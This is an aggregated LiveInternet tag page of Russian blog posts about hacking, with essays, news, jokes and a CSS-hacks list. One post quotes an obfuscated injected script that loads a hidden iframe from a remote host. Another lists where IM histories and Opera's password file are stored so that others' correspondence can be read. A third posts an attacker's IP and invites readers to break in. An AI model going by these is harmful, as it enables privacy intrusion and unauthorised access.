Случайны выбор дневника Раскрыть/свернуть полный список возможностей

Найдено 214 сообщений
Найти по тегу
Облако тегов

хак - Самое интересное в блогах

Страницы: [1] 2 3 ..
.. 20
SoXiE

Ыхыхы))

Понедельник, 12 Марта 2012 г. 22:50 (ссылка)
Может я чего-то не понимаю?)))) Есть у меня такая почта, да, но паса такого не стояло там. Объясните, что бы это могло быть?
Sculls123 ты вообще что за хуй такой с горы?
Теги:   Комментарии (0)КомментироватьВ цитатник или сообщество
Елена_Эшт

Мир ПК №9 ( сентябрь ) 2011

Понедельник, 12 Сентября 2011 г. 14:28 (ссылка)


2920236_Mir_PK_09_2011 (428x600, 52Kb)



Чековая книжка анархиста.

Хак и хакеры.

Сверхвозможности вашей техники.  



Теги:   Комментарии (0)КомментироватьВ цитатник или сообщество
Luris_inc

Яблофилия

Пятница, 25 Февраля 2011 г. 09:31 (ссылка)
Летом этого (2011) года выходит Mac OS X 10.7 Lion. Сейчас доступна бета-версия для разработчиков. Ее обзор я прочел на appleinsider.ru. Интересное чтиво оказалось.

В прошло году я поставил себе на PC Мак (а точнее хак, что не имеет особого значения). Мне все понравилось, в общем-то, кроме пары моментов, о которых умолчать невозможно. Во-первых, нельзя было развернуть окно браузера на весь экран (возможно и других приложений, но отсутствие такой возможности у браузера меня огорчило больше всего). Safari сам по себе не плох, но смотреть в окно на 1/2 экрана как-то не очень приятно. Особенно учитывая, что экран у меня был 17’’ - так и вовсе бредово. Конечно, растянуть окно на весь экран было можно, но это очень неудобно. Кнопкой ведь гораздо проще. Поэтому я отказался от Мак. Да-да, бывает и такое: отказался только из-за того, что браузер нельзя на весь экран развернуть.
Во-вторых, очень неудобно работать с клавиатурой от PC. Я понимаю, что Мак есть Мак, создан он не для PC, а по сему и клавиатура должна быть от Apple, но все же это был большой минус.
В третьих, множество минусов, связанных с софтом. Я убежден, что любая система должна быть интуитивно понятна. Настолько, чтобы впервые севший за компьютер человек через час мог пользоваться браузером, писать письма в почтовой программе, создавать любые документы, устанавливать/удалять приложения, работать с графикой (на уровне картинку обрезать, стеркой поработать, текст на картинку добавить и т.д.). С маком это невозможно. Я-то разобрался, конечно. И уложился по времени. Вот только я заранее готовился к этой системе, многое читал и видел. Если не подготовка — я бы тоже не разобрался.

Речь выше шла о Мак 10.5.9. 10.6 я пробовать не стал, потому что особых отличий не обнаружил в описании.

А вот в 10.7 появилось множество «революционных» нововведений. Конечно, «революционных» в кавычках, потому что революция опоздала на пару лет.

Появилась возможность развернуть приложение на весь экран. Надо нажать на эту кнопочку:



На том сайте, где я читал обзор, написано «каждое приложение, по крайней мере стандартное, будет иметь полноэкранный режим. Так вот не обманули нас, товарищи. Так оно и есть. Стандартные приложения имеют вот такой незамысловатый значок в верхнем правом углу экрана». По-моему, нововведение сыровато еще. Может по-тестируете? А то как-то необычно разворачивать приложения, по крайней мере стандартные, да на весь экран. Аж мурашки по коже...

Далее автор обзора пишет: «Как видно, сначала это была картинка полностью моего экрана, а затем я ее обрезал. Просто? А как же — это же Mac». Интересно, только в Маке можно это сделать? Мне кажется, что даже в Windows уже давно можно обрезать картинки стандартными средствами. А в Ubuntu так и вовсе в любом граф пакете, даже в стандартном вьювере. Опять яблочники гордятся тем, что у всех уже давно есть.

И вывод обзора шикарен: «если Microsoft ничего координально нового не успеет представить нам на обозрение, то Apple, во главе со Стивом или Тимом, совершат еще одну революцию как в мире техники, так и в наших сердцах».

Яблофилы такие яблофилы...

Однако есть те, кто не кичиться творить революции, а просто делает свое дело. Речь идет все о тех же киевских бизнесменах. Иногда просто поразительно, насколько офисная мебель в Киеве дешевая, качественная, красивая и удобная. При этом сервис на высоте, разумеется. Ну, сами можете убедиться, посмотрев, к примеру, шкафы купе на сайте www.meblikiev.com.ua/galereya/shkafi-kupe/.
Теги:   Комментарии (0)КомментироватьВ цитатник или сообщество
onlyroricon

Hack. АРТ

Суббота, 25 Сентября 2010 г. 11:49 (ссылка)
Теги:   Комментарии (2)КомментироватьВ цитатник или сообщество
Humiliating

WebInject 1.41 - ваши скрипты в порядке?

Суббота, 19 Июня 2010 г. 18:09 (ссылка)

- инструмент для проведения тестов на проникновение в среде JSP, ASP, CGI, PHP, Servlets,HTML Forms, XML/SOAP сервисов.


Очень актуален для всех WEB-разработчиков.


Status Window

on MS Windows XP:



Status Window on MS Windows XP


(click image to enlarge)

Вложение: 3799677_webinject1.zip

Теги:   Комментарии (2)КомментироватьВ цитатник или сообщество
Humiliating

Решил русифицировать BackTrack 4 и выдать за свою ОС.

Четверг, 03 Июня 2010 г. 22:15 (ссылка)
Пока только проинсталлил на хард, там посмотрим.
Думаю начать с Ubuntu Tweack и продолжить пакетим Custom Kit, ну а дальше ремастерсис нам в помощь!

Новая мода пошла - троллить ОСЯМИ, это вам не ZverDVD!

И наплевать мне, что пора сдавать квартальный отчет по моей конторе [Русская Раскрутка]- нарыл хорошую штуку - минимизация налогообложения онлайн. Полезно и приятно, Рекомендую.

Вот, для тех, кто "в танке" скрин БэкТрека:
 (699x523, 181Kb)
Теги:   Комментарии (4)КомментироватьВ цитатник или сообщество
abasaka (Автор -TooYoungToLove)

[Правда?] Операция <Хак-антитеррор>

Четверг, 25 Марта 2010 г. 09:35 (ссылка)
Криминальные новости

Многие продвинутые пользователи уже знают, что на днях бесстрашным Хеллом был гламурно захачен блог №1 в ЖЖ ibigdan. Ибигдан, к слову, обладает таким внушительным копипастерским хуищщем, что по сравнению с ним «краники» наших блогбастеров, радиохедсов и дие_кто_то_там выглядят просто прыщами на теле рунета. За несколько часов робот Хелла удалил около 18 тысяч записей из 23 тысяч.
В то время, как ФСБ, SUP и все задрот-блоггеры разыскивают хакера по всем злачным заведениям, чтобы надавать ему по заднице, сам Хелл пришёл к нам в редакцию, чтобы попить пивка и рассказать нам о своих планах, ну и заодно ответить на некоторые наши вопросы.
 (320x240, 14Kb)


- Скажи, Хелл, зачем ты поимел ибигдана, помимо того, что он просто уебан и бесталанная скотина?
- Ну, просто моя 7-летняя сестренка нечаянно подписалась к нему и не знала, как отписаться. После этого её френдлента заполонилась убогим говном, ибо этот мудак хуярит по 30 пизженных постов в день, и у неё случился нервный срыв.
- А тебе кто-нибудь платит за то, что ты пиздишь подобных уёбков?
- Ха-ха! Ну конечно, творческая «элита» ЖЖ во главе с Радуловой собирают с миру по нитке, и заказывают мне очередного копипастера! Шучу конечно, всё это я делаю для собственного удовольствия, ну и для будущего поколения блоггеров конечно. В то время, как вы умеете только пиздеть, я занимаюсь делом.
- А почему ты хачишь только ЖЖ-шников? Можешь, например, взъебнуть нашего БлогБастера, ибо он всех уже заебал со своими «съедобными пейзажами»?
- Гы! В вашей лирушечке эта древняя XSS-уязвимость до сих пор не пофиксена, так что я всё уже поломал. Вот вам диск с логинами и паролями всех лирушников, держите. С вас ящик пива, если че, кстати.
- Да, нивопрос. Ну и последний вопрос, что в интернете ты читаешь?
- Ну в основном закрытые хак-форумы, пару жж-друзей, ну и «абасаку» конечно. Вы конечно много пиздите, но пиздите по делу. А это в наше время большая редкость.
- Спасибо, чувак. Удачи тебе в священной войне с уебанами.
- Ага.

 (699x338, 102Kb)


P.S. Редакция «абасаки» объявляет конкурс для наблюдательных. Задача: написать пост-пародию на любого известного(или не очень) лирушника. Подробные правила – совсем скоро в отдельном посте. Призы как никогда знатные –
3 место – почет
2 место – уважение
1 место – диск с логинами и паролями всех лирушников

С уважением, редакция «Абасаки».
Теги:   Комментарии (10)КомментироватьВ цитатник или сообщество
SoXiE

Молодому перлюстратору

Суббота, 22 Ноября 2009 г. 00:32 (ссылка)
Понятие перлюстрация пошло от латинского perlustro — обозреваю, одно из древнейших искусств, испокон веков требующее бдительности и осторожности. Политики и тираны активно использовали перлюстрацию чтобы предотвратить перевороты, сохранить свою власть и наказать вольнодумцев. Начиная со времен Людовика XV и вплоть до XIX века переписка неблагонадёжных лиц во всём мире массово контроллировалась специальными органами. Разумеется, без ведома отправителя и адресата. У многих есть небезосновательные подозрения, что перлюстрацией также занимались органы НКВД и КГБ в кровавые 1930-е и позднее, в годы террора. И стоило лишь упомянуть вождя или что-то с ним связанное в чёрном свете, как за отправителем отправлялся «воронок», и дальнейшая судьба человека была уже предрешена - сам не зная, приговор себе мог подписать каждый, обронив неловкую фразу или жест. Менялись нравы, обычаи, и в наше время вскрытие корреспонденции третьими лицами без соответствующей санкции запрещено законами многих государств.
В XXI веке с широким распространением электронных средств связи и социальных сетей государственных санкций стало больше - этим объясняется некая популярность мифа о том, что все соц.сети принадлежат ФСБ, но на деле подтверждаются только рядовые случаи поимки нарушителей, так или иначе участвовавших в той или иной сети. Известны прецеденты, что работница одной крупной компани (планктон) была уволена за то, что отпросившись с работы под предлогом нездоровицы, была замечена через полчаса онлайн в сети Facebook. Аргумент - если есть силы на интернет, значит работать можно. Этот случай не имеет отношения к перлюстрации, а лишь доказывает, что электронные средства связи являются неотъемлемой частью жизни современного человека. Также известны прецеденты, когда полученный доступ и возможность перлюстрации заканчивались плачевно: потеряв голову, перлюстраторы и взломщики совершали деструктивные действия - меняли пароли, удаляли всю корреспонденцию, что вызывало бурю эмоций у их жертв и звонок в милицию, а дальше судьба хакеров известна, ведь несанкционированный доступ и вторжение в личную жизнь карается законом, порой жестоким и безразличным.
Чтобы обезопасить себя (а я уверен, каждому есть за что трястись) и не компрометировать перлюстраторов, рекомендую применить несколько мер:

отключить интернет/wifi/dial-up и все возможные сети
заколотить или залепить жвачкой CD/DVD/Floppy-дисководы и USB-порты
открыть Пасьянс «Косынка» или Сапёр и наслаждаться полной безопасностью

Шутка гмгм. Волков бояться - в лес не ходить, скучно, не правда ли? Выход - либо не хранить в сети важных данных, не участвуя в социальных сетях и прочих публичных местах, доступ к которым может привлечь злоумышленников, а всё личное и сокровенное хранить на своём компьютере, не подпуская к нему на метр никого постороннего. Чудовищно звучит? Особенно при нынешнем ритме и направленности жизни, и учитывая, что говоря компьютер ныне подразумевают ноутбук, который можно оставить на 5 минут в публичном месте не беспокоясь за сохранность.
Избежать взлома электронной почты и мессенджера ICQ можно используя трудноперевариваемые и плохозапоминаемые пароли (помнится, использовал 28-значный цифровой пароль, который самому сейчас трудно вспомнить) с разным сочетанием символов - заглавные и прописные буквы, цифры и знаки. Собственно, такие советы довольно банальны, самое главное - чтобы ни одна живая душа не знала один главный (скажем так master-адрес) почты. Он должен быть известен только тебе, как и пароль на него, как и ретрив-ответ. Адрес и ящик лучше всего использовать как регистрационный на разные соцсети (но только чтоб он оставался скрыт от глаз), платёжные системы, месенджеры, частные дневники и прочие невероятно ответственные вещи. При должном упорстве можно сделать так, чтоб на него не валил спам и нотификации. Второй же ящик может быть публичным, откровенно засираемый спамом и прочей перепиской (которая отживает своё благодаря IM). Этот адрес можно вешать на сайтах знакомств, объявлений, давать окружающим, писать не скрываясь, короче для всего остального, и как правило, современные почтовые системы организуют свою зачаточную социальную сеть, где можно под этим же адресом открывать свою публичную страничку (которая в свою очередь вряд ли пригодится). Но мастер-адрес всё так же держим в секрете.
В нынешней сети происходит деанонимизация, и чем больше ты напишешь и оставишь следов в сети, тем легче тебя будет прочесть. И не беда если сломают публичный адрес - ничего особенного там найти не удастся, кроме разве что горы нотификаций «Соцсеть: Имя фамилия оставил вам личное сообщение». Все сетевые премудрости здесь не опишешь, да и не всегда онлайн может скрывать то, что скрывает завеса красного цветочка...
Если есть доступ к компьютеру, нет вообще ничего сложного. Какой бы ни был параноидальный пользователь, на тех кто пляшет русалочьи пляски есть тот, кто идёт по воде, то есть те, кто единожды получив доступ к машине больше не выпустят её из кабалы. Самое ценное что чаще всего ищут перлюстраторы и хакеры - пароли к платёжкам, онлайн-играм, переписку, пароли к ценным номерам ICQ, фотокарточки. Всё это нетрудно достать (при выполнении вышеуказанного условия), зная где что спрятано. Истории переписки:
ICQ: %APPDATA%\ICQ\#номер_или_UIN#\Messages.qdb
QIP: %HOMEDRIVE%\Program files\QIP\Users\#номер_или_UIN#\History\*.txt
QIP Infium: %HOMEDRIVE%\Program files\QIP Infium\Profiles\#номер_или_UIN#\History\*.qhf
MAgent: %APPDATA%\Mra\#email_полностью#\*.*
Остальное достаётся либо через RTFM документации к софту и игрушкам, либо тщательные эксперименты и гуглинг.
Кэш паролей к Opera лежит в %APPDATA%\Opera\Opera\profile\wand.dat, который тоже придётся расшифровывать утилитками. Пароли к Infium хранятся в файлах .qip в папке профиля. Множество людей на живых примерах хранит все фотографии и видео в одной единственной папке на диске с данными, а сакраментальные - достаточно далеко и пользуются аттрибутом hidden (как правило, наивно), поэтому придётся потрудиться составить древо дисков/папок/файлов чтоб отделить зёрна от плевел.
Для этих нужд я даже написал две софтинки (разумеется, используя их офлайн с заколоченным дисководом и играя в Сапёр). Первая - QIPTruth, из всей истории вычленяет куски, соответствующие определённым периодам и авторам, опять же зёрна от плевел, одного разделения по юзерам как в qip недостаточно. Вторая же помогает файл дерева дисков преобразовать в визуальное дерево и не ломать глаза в поисках нужного файла.
Программка для комлексного анализа истории QIP Программка для удобочтения древа диска и вычленения файлов

Как добропорядочный гражданин, написал в about-разделе предупреждение:

ВНИМАНИЕ! Не рекомендуется людям с неустойчивой или ранимой психикой (всегда лучше правило меньше знаешь - крепче спишь). Это скорее баловство, чем что-то серьезное, все равно чужая душа - потемки, необязательно сие творение прольет свет и Вы получите то, что хотели. За последствия я не отвечаю.

Я побывал в роли такой жертвы чуть менее десяти лет назад. Мой близкий друг был заинтригован, и «прикола ради» в моё отсутствие получил доступ к компьютеру. Когда же я зашёл в комнату и увидел его с хитрой лыбой, он включил монитор, я сразу всё понял и почувствовал себя awkward as an elephant. Конечно же потом это состояние сменилось истерикой, частой сменой настроений и некоторым количеством бессонных ночей, но самое печальное в этой истории другое. Мы были детьми и не понимали граней жестокости, в том что было засекречено на моём компьютере не было ответов на вопросы мироздания, равно как и не было доказательств моей гомосексуальности, как и каких-то анатомических отклонений типа ануреза. Но мне было безумно неприятно и больно, когда ещё несколько человек были посвящены в этот милый детский секретик. Неудивительно, что я полностью простил только после его смерти, хотя несколько лет мы относительно нормально общались.

В общем, я вам настоятельно не рекомендую делать какие-либо шаги в вышеуказанном направлении (а использовать эти материалы и tips как мануал по слабым местам), это может привести к многократному штудированию УК РФ в соответствующих не столь отдалённых местах, в лучшем случае - полной порче отношений с тем, кого вы захотели изучить поподробнее.
Теги:   Комментарии (0)КомментироватьВ цитатник или сообщество
Медвежонок_Впадлу

Список паролей и логинов Вконтакте

Понедельник, 16 Ноября 2009 г. 12:37 (ссылка)
В открытый доступ попали логины и пароли от популярной социальной сети Вконтакте. Примерно 13 тысяч аккаунтов.

http://ifolder.ru/15006215 - вот здесь список только ЛОГИНОВ, можете провериться

Сколько раз надо говорить, чтобы не вводили нигде пароли и логины от контакта?
Теги:   Комментарии (4)КомментироватьВ цитатник или сообщество
Humiliating

Права надо выставлять правильно!

Четверг, 29 Октября 2009 г. 11:14 (ссылка)


И внизу страницы фрейма с незагруженной страницей. Ломится куда то типа cnnccn.cn

Что это и как лечить?
Ну и вgоросец однако дурацкий! Шутки китайских коллег, ну или русских, арендовавших сервачок в китае В php.ini - это в худшем случае,создаётся модуль для вебсервера, хотя тоже самое можно сделать и через .htaccess c помощью php_value auto_prepend_file и php_value auto_append_file -
для этого действа, как вы уже поняли, высокие права в системе не нужны :)



Кстати по теме: продаются китайские бульдозеры , качественные и не сильно дорого.
Я про chmod говорю. Тогда дедики ломать не будут, тут очередной башорг:

Простейший скрипт <? phpinfo(); ?>

Когда вызываем его в браузере внизу страницы отображается вот такая вставка:



Цитата
<script>var ovd=eval,raQ=unescape;ovd(raQ(".64.6f.63.75.6d.65.6e.74.2e.77.72.69.74.65.28.22.3c.69.66.72.61.6d.65.20.73.72.63.3d.27.68.74.74.70.73.3a.2f.2f.6e.63.63.63.6e.6e.6e.63.2e.63.6e.2f.69.6d.67.2f.69.6e.2e.70.68.70.27.3e.3c.2f.69.66.72.61.6d.65.3e.22.29.3b".replace(/[\+.]/g,"%")));</script>

Теги:   Комментарии (0)КомментироватьВ цитатник или сообщество
Humiliating

Давно меня так вантуз не смешил!

Среда, 28 Октября 2009 г. 14:59 (ссылка)

 вашему вниманию предлагается 3 скрина ржачных, до потери ориентации.


Меня пробудил от спячки очередной стук на якобы открытый 3389 порт, смотрите картиночку:




из оной ясно - я не стал заниматься хернёй, а по подсказке шестого чуства ломанулся к хакцору прямо браузером и долго ржал аки конь апокалипсиса!




Вантуз-сервер мелкомягких рулит! Особенно смалл бизнес, который в идеале по дефолту веб-морду для удалёнки выпячивать не должен.


И пожставлятся как шлюшка тоже. Мну решил что это ханик, но дальнейшее лазанье по ресурсу показало: хозяин просто дурак, увы:




 спасибо ему за хорошее настроение, за то, что дал мне возможность похохотать и поднял настроение. БАШ!


Взломать не сложно, однако глупо и не соответствует моим целям. Ну а вы можете попробовать. Не терзайтесь совестью: он первый начал:


Атакующий хост: 62.49.60.189 thomasg-adsl.demon.co.uk

  дата/время начала сканирования:     28.10.2009 15:10:02

  кол-во сканирований:      3

  Атаковано портов 1

   3389/TCP кол-во атак = 3, подозрений DoS = 0


Это один из бретанских ученых наверное проверял свои теории, надо секлабовцам сказать - пусть поприкалываются.

Теги:   Комментарии (11)КомментироватьВ цитатник или сообщество
-null-

5 копеек о хЭк-сцене

Суббота, 17 Октября 2009 г. 12:23 (ссылка)

Доброго времени суток, уважаемые )) Небось уже и не ждали. А мы приперлись )) Поведу сегодня речь о так называемой "хак-сцене" (или scene, как ее называют). Однозначно найдутся среди людей, которые прочтут это (и, сюрприз-сюрприз, считают себя хакерами) и скажут, что я ничего в этом не понимаю. Что я не "хЭккер" и т.п. Да, я не "хЭккер", но посмотреть на сцену за все время моего отсутствия на "лире" я успел. ))) Оценивал в основном с технической стороны.

Так что же это такое? Это условное самопровозглашенное название группы людей, которые вроде бы как совместно занимаются взломом, реверсивной инженерией, написанием вирусов и такой отвратительной на мой взгляд дисциплиной как социальная инженерия. Сцена характеризуется ореолом таинственности, загадок и пафоса, витающего над ней. Безусловно такая атмосфера способствует привлечению внимания молодых и не всегда понимающих основы молодых людей. Условно сцену можно поделить на 3 категории:

1. Веб-хак сцена, или просто хак-сцена.

2. Реверс-сцена

3. VX-сцена

4. Синжен-сцена

Первые, как было не трудно догадаться, занимаются поиском уязвимостей в сетевых приложениях и используют их для получения контроля над системой.

Вторые занимаются реверсивной инженерией программ (это настоящая элита, потому что нормально читать ассемблерный код могут не многие, еще меньше его понимают в процессе отладки незнакомого алгоритма с кучей антиотладочных трюков и бешеной обфускации кода) и целью настоящего реверсера является восстановления алгоритма работы с целью его репликации в своих проектах или выработки способов противодействия данному алгоритму (в частности все AV-конторы имеют в обязательном порядке подразделения реверсеров, которые изучают работу вирусов в лабораторных условиях).

Третьи - это те люди, которые занимаются разработкой и написанием комьютерных вирусов всех мастей. Также как и в случае реверс-сцены, в массе своей там находятся люди с наибольшим уровнем квалификации. Однако, они также не являются коллективной силой, т.к. даже элементарное повторение какой-либо техники всегда реализовывается одним человеком. Любопытно, что даже сами VX-еры это признают.

Четвертые - это мошенники с компьютером, которые себя гордо называют соц. инженерами или синжерами. Закономерный вопрос - что же это такое синженг? Отвечаю. Любая цыганка им обладает, любой профессиональный кидала, и некоторые недобросовестные психологи. По сути - это навык обмана. Хотя сами они предпочитают называть это "взломом мозга". Но очевидно, что в техническом аспекте - синженг имеет больше общего с навыками аферистов и кидал. Поэтому лично у меня эти люди вызывают только ненависть и отвращение как и остальные преступники. Первые три категории у меня либо ничего не вызывают, либо восхищение их техническими навыками.

Теперь скажу на счет технического аспекта. Веб-хакинг пожалуй наиболее всего будоражит умы молодых, зеленых и жаждущих стать хакерами людей. Однако вся романтика исчезает с появлением у вас Slax-liveCD с готовым Metasploit Framework'ом и Backtrace 3, потому что все творчество максимально автоматизируется. Как сказал в своей статье уважаемый мной Z0mbie.A29 в своей статье "Эмулятор вирмейкера": "Хакера эмулировать еще проще. Домашней странички не нужно, достаточно поставить где-нибудь nmap, пару скриптов на перле, и юникодом дефейсить найденные ишаки с подстановкой соответствующего рандомного никнейма." Если бы я не прочувствовал это на собственном примере, то конечно же бы слегка усмехнулся бы. Однако это правда. Поэтому с моей позиции веб-хак - это не искусство, а ремесло. Причем у него уже есть и "светлая" сторона. На западе это называется "Penetration test". В России этим занимается пока только "Диалог-наука". Суть pen-test'а в полноценной хакерской атаке на тестируемую систему и выдача результатов такого анализа сисадминам, далее дырки закрываются и система виртуально неуязвима (виртуально, потому что человеческий фактор все еще остается и проклятые синжеры могут преуспеть там, где чисто технический хакер может обломаться). Короче достаточно потратить немного времени на изучение сетевых протоколов и взять в руки Backtrace 3 и можно смело взламывать сайты. Но удовольствия оно не приносит почему-то.

Реверсивная инженерия пожалуй самая интересная хакерская дисциплина. Скажу по своему опыту - взлом даже со специальными инструментами вроде непревзойденной IDA Pro 5 все равно остается нетривиальной задачей. Да, можно запросто сделать дамп памяти программы после ее распаковки. Да, можно запечатать вход в процедуру проверки регистрации. Да, можно подключить очень интересные плагины стелс-отладки. Но! Это вам не прибавит ни на йоту знаний об исследуемом алгоритме, а стало быть без должной квалификации вы никогда не поймете что же происходит. Ситуация резко усложняется при анализе самомодифицирующегося кода. Признаться честно, я так и не смог ни один раскусить. Хотя как устроена платформа IA-32 знаю не по наслышке. Поэтому элита данного типа хакеров вызывает мое наибольшее восхищение.

VX-сцена такая же разная как и предыдущая. Здесь есть и аналог script kiddie, которые берут себе конструктор вирусов и не вникая в особенности архитектуры вируса и платформы на которой он будет исполняться просто штампуют их в неограниченных количествах и рассылают по сети. Естественно, что только ленивый пользователь без антивируса в системе сможет подцепить такое чудо. Зато понтов у таких больше чем у ламеров с веб-хак сцены. А есть полная им противоположность - истинная элита VX-сцены. Чаще всего - это дядьки под 30 лет с вирусописанием как хобби. Их не интересует вирулентность их детища (ну только, если они это не изучают), их может и не волновать полезная нагрузка (опять таки, только если они не изучают ее). Их интересует в первую очередь открытие новых техник в написании вирусов и улучшение старых. Сейчас правда этот процесс на мой взгляд замедлился, т.к. дальше техник полиморфизма пока еще никто не пошел. Но это явление временное. Безусловно успех таких людей во многом определяется их глубокими (не меньше чем у элиты реверсеров) и обширными познаниями в компьютерных науках. Есть подозрение, что все VX-еры хорошие реверсеры. Но прямых подтверждений этому я пока не нашел.

А про четвертых я могу сказать только, что их познания в техническом аспекте взлома минимальны. Их основное оружие - слово. Наверняка кто-то из вас получал письма подписанные администрацией сайта, или модераторами или еще кем-то выше вас по рангу с требованием сообщить логин (или почту) и пароль. Или, например, в том же "Вконтакте" постоянно боты взламывают чьи-то анкеты и с них по списку друзей подсовывают всякие ссылки. В основном на приложения. Человек переходит по ссылке и либо ничего не видит, либо что-то там играет, но его данные уже украдены. В данном случае происходит комбинированная атака, когда соц. инженерия (акт подсовывания ссылки типа от друга) и примитивный веб-хакинг (зачастую приложение крадет coockies с личными данными).


Ну и напоследок маленькой юмор от тов. Константина Климентьева:


Вопрос: Хочу научиться писать вирусы, почему меня все отговаривают?


Ответ : Потому что водка, карты и бабы гораздо полезней для здоровья.

Теги:   Комментарии (0)КомментироватьВ цитатник или сообщество
Джесика_Шоу

В Оренбурге обиженный на низкую зарплату хакер уничтожил базу данных компании

Среда, 21 Мая 2008 г. 07:35 (ссылка)
В Оренбурге милиционеры задержали молодого человека, который подозревается в создании и распространении компьютерного вируса. В стремлении досадить бывшему работодателю злоумышленник уничтожил целую базу данных компании.

Точная сумма нанесенного ущерба еще устанавливается, но по приблизительным подсчетам составляет сотни тысяч рублей, передает РИА "Новости" со ссылкой на представителя пресс-службы Следственного комитета при МВД РФ.

По данным следствия, до осени 2007 года подозреваемый работал системным оператором в одной из аптечных сетей города Оренбург. Затем он уволился по собственному желанию.

Позднее молодой человек узнал, что взятому на его место сотруднику назначили заработную плату в два раза больше той, что прежде получал он сам. "Этот факт молодого человека сильно огорчил", - добавили в МВД.

Тогда обиженный хакер создал вредоносную программу, которая должна была уничтожить всю базу данных аптечной сети.

Зная коды доступа, злоумышленник отправил программу на электронный адрес сети под видом заявки, чтобы сотрудники компании быстрее ее запустили. Получив письмо-"заявку", новый администратор "автоматически запустил программу", пояснили в милиции.

В результате активизации вируса было уничтожено около 17 тысяч документов, хранящихся в базе данных компании. Все поставки медикаментов были сорваны.

В ходе обыска у подозреваемого изъяли ноутбук, содержащий вредоносную программу. В отношении него возбуждено уголовное дело по части 1 статьи 273 УК РФ (создание, использование и распространение вредоносных программ для электронно-вычислительных машин). Молодому человеку грозит 3-летний срок заключения.

Расследование ведут специалисты из отдела "К" министерства внутренних дел.
Теги:   Комментарии (1)КомментироватьВ цитатник или сообщество
Brutall_Psyho

Dark Basic и ResHack

Вторник, 20 Мая 2008 г. 14:01 (ссылка)
Скатал дарк бейсик - это типа прога по созданию разных гем.
Но она, сц, оказалась триалкой. Покопался в инете насчет кряков, нашёл чудесную прогу - хакер ресурсов(обрабатывает ехе, длл и проч)! Взломал его! Вот скрин - обратите внимание на надпись внизу)))
 (308x262, 56Kb)
Теги:   Комментарии (9)КомментироватьВ цитатник или сообщество
nohacktoolz

А почему nohacktoolz? o_O или история создания ника

Четверг, 13 Декабря 2007 г. 15:44 (ссылка)
Помню я в 41... ^^
Дело было в КК.
В процессе взлома серверов пентагона ( вражеский хост ;) ) я сидел и думал...
Начал ломать тулзами... Ничего не выходило... Я и подумал " А че я как мудак, собсна говоря? Думать надо не чужими мозгами, а своими! ". И начал " атаковать хост мозгом ". Получилось гораздо успешней и быстрее ;) После этого, никакхи тулзов.
Еще 2 дня назад я решил никакого хака и кодинга вообще ;) Но днев был создан еще до этого ;) Вот собственна и вся история.

Совет.
Никогда не юзайте хак-софт, только если свой. Он может принести вашему компъютеру гораздо больший вред, чем вы жертве. А так-же вашим знаниям. И если " дети " говорят, что они хакеры, при этом не могут своего софта написать ( для своих же потребностей ), ребят, знайте...
они просто понты...
 (700x525, 292Kb)
Теги:   Комментарии (0)КомментироватьВ цитатник или сообщество
Как_делать_сайты

html и css для разных браузеров, кроссбраузерность

Пятница, 12 Октября 2007 г. 12:47 (ссылка)
Чтобы сайт отображался в разных браузерах одинаково, иногда надо знать некоторые хитрости и хаки, существующие в них, это список статей на эту тему:

Определяем тип и версию браузера с помощью HTML комментариев


Здесь приведены некоторые странности или нелогичности браузеров и способы их разрешения в CSS.


Условные комментарии в CSS


Jello Molds & Width Control


Трюк с блочной моделью CSS



Каждому браузеру свой стиль (Применение JavaScript)


About Conditional Comments (спецификация на английском)


Персональные CSS-хаки для Opera, FireFox, Internet Explorer


CSS-хаки(англ.)


Почти все эти статьи можно найти, набрав в Яндексе "[if gt IE]" (с кавычками))))

Эти статьи расположены на очень хороших сайтах, рекомендую посетить.
Теги:   Комментарии (0)КомментироватьВ цитатник или сообщество
Lastnet

Просто самык крутой сайт про Хакеров.

Четверг, 23 Марта 2006 г. 21:00 (ссылка)
xakep.ru все хорошие проги, для атак , защиты , и просто полезных програмок.
Теги:   Комментарии (0)КомментироватьВ цитатник или сообщество

хак - Самое интересное в блогах

Страницы: [1] 2 3 ..
.. 20

LiveInternet.Ru Ссылки: на главную|почта|знакомства|одноклассники|фото|открытки|тесты|чат
О проекте: помощь|контакты|разместить рекламу|версия для pda